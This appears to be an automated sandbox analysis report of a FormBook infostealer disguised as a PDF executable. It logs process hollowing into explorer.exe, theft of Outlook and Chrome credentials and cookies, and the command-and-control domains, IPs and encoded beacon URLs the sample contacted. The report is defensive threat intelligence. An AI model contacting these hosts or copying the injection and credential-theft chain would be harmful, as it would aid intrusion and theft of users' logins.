Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.520390318.00000000010B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.519325021.0000000001080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.517474120.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.373978746.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.402693120.0000000005917000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 708243 Sample: AM PROJECT PDF.exe Startdate: 23/09/2022 Architecture: WINDOWS Score: 100 32 Malicious sample detected (through community Yara rule) 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected AntiVM3 2->36 38 5 other signatures 2->38 8 AM PROJECT PDF.exe 3 2->8         started        process3 file4 22 C:\Users\user\...\AM PROJECT PDF.exe.log, ASCII 8->22 dropped 48 Injects a PE file into a foreign processes 8->48 12 AM PROJECT PDF.exe 8->12         started        signatures5 process6 signatures7 50 Modifies the context of a thread in another process (thread injection) 12->50 52 Maps a DLL or memory area into another process 12->52 54 Sample uses process hollowing technique 12->54 56 Queues an APC in another process (thread injection) 12->56 15 explorer.exe 12->15 injected process8 dnsIp9 24 fellyhub.com 162.241.194.111, 49723, 80 UNIFIEDLAYER-AS-1US United States 15->24 26 www.soraligne.com 15->26 28 2 other IPs or domains 15->28 30 System process connects to network (likely due to code injection or exploit) 15->30 19 svchost.exe 13 15->19         started        signatures10 process11 signatures12 40 Tries to steal Mail credentials (via file / registry access) 19->40 42 Tries to harvest and steal browser information (history, passwords, etc) 19->42 44 Deletes itself after installation 19->44 46 2 other signatures 19->46
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.241.194.111
 fellyhub.com United States
46606 UNIFIEDLAYER-AS-1US true
34.102.136.180
 soraligne.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
fellyhub.com 162.241.194.111 true
soraligne.com 34.102.136.180 true
www.fellyhub.com unknown unknown
www.soraligne.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.soraligne.com/rdny/ false
  • Avira URL Cloud: safe
 unknown
http://www.fellyhub.com/rdny/?7n-=6lYX&A0G=dZ8Ayr2drPdNVPVmuvzgGnZ5EDtn0CBwsWjIF75G8uy0K/UwgFE8TCCkfo+4feZhoJ7iWr04K24a/vrIrcJXcRwwE/YP1kXGBw== true
  • Avira URL Cloud: safe
 unknown
www.texasfirsthonda.com/rdny/ true
  • Avira URL Cloud: safe
 low
http://www.soraligne.com/rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX false
  • Avira URL Cloud: safe
 unknown